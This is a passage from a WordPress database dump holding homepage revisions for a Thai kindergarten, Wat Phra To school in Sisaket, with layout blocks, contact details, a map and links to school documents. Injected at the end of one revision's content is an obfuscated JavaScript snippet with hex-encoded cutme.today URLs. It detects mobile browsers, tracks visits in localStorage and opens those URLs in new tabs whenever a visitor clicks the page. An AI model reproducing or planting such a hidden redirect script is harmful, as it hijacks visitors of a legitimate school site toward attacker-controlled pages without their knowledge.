{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:23:21','2025-07-15 07:23:21','',19,'http://watprato.ssk.in.th/?p=677',0,'revision','',0),
(679,1,'2025-07-15 14:28:01','2025-07-15 07:28:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 